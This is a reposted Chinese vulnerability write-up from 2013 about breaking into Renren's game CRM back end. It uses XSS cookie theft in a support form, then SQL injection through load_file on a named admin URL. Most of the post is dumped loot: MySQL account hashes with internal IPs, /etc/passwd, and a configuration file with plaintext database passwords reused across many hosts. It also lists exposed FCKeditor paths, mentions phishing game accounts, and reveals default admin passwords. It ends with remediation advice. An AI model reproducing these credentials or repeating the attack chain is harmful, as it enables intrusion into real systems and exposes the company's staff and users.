
人人网游戏XSS+SQL注入+爆路径+列目录,员工信息大量泄漏

2013-03-25 16:57:06 / 个人分类:相关知识

通过XSS窃取cookies,再配合SQL注入;数据库账号权限很大(root),可以直接load_file('/etc/passwd')读取服务器上的文件
目测拿下wan.renren.com
http://wan.renren.com/service.shtml
首先在客服页面随便选了一个客服,提交表单时在某个字段(似乎是姓名字段,记不清了)插入了XSS代码,之后就收到了cookies
随后用这些cookies进入了后台,拿到的是高级管理员权限
 
爆路径 http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
 
sql注入 http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
需要携带有效的登录cookies(已认证的管理员会话)才能触发这个注入点
 
 
Target:http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
Host IP:60.29.248.160
Powered-by:PHP/5.2.5
Web Server:lighttpd/1.4.13
DB Server:MySQL >=5
Resp. Time(avg):149 ms
Current User:root@localhost
Sql Version:5.1.38-community-log
Current DB:CRM
System User:root@localhost
Host Name:TJHY248-160.opi.com
Installation dir:/
DB User & Pass:root:053a9bf72434f7f8:localhost
root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.227.25
msgweb:32ce979f1810450d:%
gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
stat:532a371916879d65:%
gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
webcrm:63e483b832b5e91a:%
xiaonei_ts:38e845946c9b5163:10.22.225.110
crm_zl:0e1493ed782f704c:10.4.130.79
ssgc:*A0BBFCF8936A3F109DC2CBB177EB06FF98E7C18D:10.22.225.238
replication:565491d704013245:10.22.225.20
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.225.105
kaixin_ts:*0AC48CFDD7C65E4137893E7D2CA9CEFA95130238:10.22.225.116
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.3.32.11
webcrm:*5A7EAE355A763D62D1B53ED34463A18E2EFC3837:10.22.225.28
kaixin_sg:*4F9D6AA51C3DDCEF52A115B296A6BFC49F397541:10.22.227.25
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.6.57.60
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.30.33.56
replication:565491d704013245:10.30.32.141
renren_hh:*43AED5659370B63BA30CE41A5EE8D31FBB7A0A36:10.30.34.34
crmsum:*07917BFF5284F50A2D7399560A0110F100CBB23C:10.22.225.29
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.30.37.160
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.89
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.90
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.30.33.80
renren_sz:09d725012d72e6ab:10.30.37.22
renren_lzr:09d725012d72e6ab:10.22.227.110
replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
wangkun:27df606e7932e98c:%
zhenyu.shang:658d4f1d5d32391d:10.%
kettle:565491d704013245:%
Data Bases:information_schema
CRM
CRMUSER
binlogs
mysql
testcrm
tongyongcrm
user_classfy
 
 
接下来读取 /etc/passwd
 
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
 
然后是MySQL等数据库的连接配置文件:
 
/data/web/crm.imop.com/config.inc.php
 
<?php
/**
 * Database connection settings for the CRM front end.
 *
 * NOTE(review): every credential in this file is a plaintext literal, the
 * primary connection runs as the MySQL root account, and the same password
 * ('webcrm123') is reused for nine different hosts below. Secrets belong
 * outside the web root (environment or a secrets store), each host should
 * get its own credential, and the application account should not be root.
 */
$cfg['sqlserv'] = 'localhost';
 
$cfg['sqluser'] = 'root';
 
$cfg['sqlpass'] = 'crm123li';
 
$cfg['sqllibr'] = 'CRM';
 
/**
 * Page title
 */
$cfg['title'] = 'CRM管理系统2011';
 
/**
 * Template paths (source templates and the compiled-template directory)
 */
$cfg['template'] = 'templates';
 
$cfg['template_c'] = 'templates_c';
 
// Colour palette: the same 24 colours are listed twice (48 entries);
// presumably so callers can index past 24 without wrapping — verify.
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
 
// Primary CRM database. Same host/user/password as $cfg['sql*'] above —
// two copies of one credential that must be kept in sync.
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
 
 
// Market statistics database (separate account from the rest).
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
 
// Game user database. Note: no port, unlike most other hosts here.
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");// back-office computation
 
// MGC game user database.
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
 
// SS web database (non-default port 5003).
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
 
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
 
// SSGC game user database (the commented-out block above is the previous host).
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
 
 
// SS CRM database on the local MySQL instance.
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
 
// Shop database. No port given, so the client default applies.
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
 
// Xiaonei centre
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
 
// Computation/statistics DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
 
// Message server DB
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
 
// Pagination settings
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
 
 
// NOTE(review): the closing tag is unnecessary in an include-only file; any
// whitespace after it is sent to the client and can break later header() calls.
?>
 
泄露的数据库账号和密码相当多,而且多个库复用同一个密码
 
顺便还发现了两处对外可访问的FCKeditor目录
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
 
 
另外,进后台后可以修改公告,没有任何过滤,如果我给弄个基础认证钓鱼的话,嘿嘿,也许还能搞到点游戏号
 
最后说一下,我发现他们游戏后台的默认密码全部是123456
 
修复方案:
 
对用户输入做过滤和输出转义以消除XSS(后台公告编辑等入口同样要处理);SQL查询改为参数化/预处理语句;数据库连接不要使用root账号,改用最小权限账号并收回FILE权限(文中的load_file正是靠它读到/etc/passwd);立即轮换本文已泄露的全部密码,各库不再共用同一密码,配置文件移出web目录;强制修改123456之类的默认密码;删除或限制访问已暴露的FCKeditor目录;然后限制管理员权限,加强培训


版权声明:本文转载于红黑联盟http://www.2cto.com/Article/201303/197680.html


TAG: 漏洞 人人网

 
